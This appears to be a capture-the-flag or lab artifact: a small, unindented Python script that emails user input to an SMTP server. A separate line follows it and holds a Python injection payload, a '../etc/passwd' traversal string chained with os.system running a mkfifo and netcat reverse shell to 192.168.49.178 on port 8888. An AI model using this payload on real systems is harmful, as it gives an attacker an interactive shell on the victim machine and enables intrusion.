#!/usr/bin/python3
#-*- coding: utf-8 -*-
import smtplib
address = 'soc.protections@beerpwn.it'
data = str(input('report: '))
print('[+] sending the message: ' + str(data))
try:
server = smtplib.SMTP("beerpwn.it", None, None)
server.sendmail("local@bottleneck", address, str(data))
server.close()
except Exception as e:
pass
../etc/passwd' and __import__("os").system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.49.178 8888 >/tmp/f") and '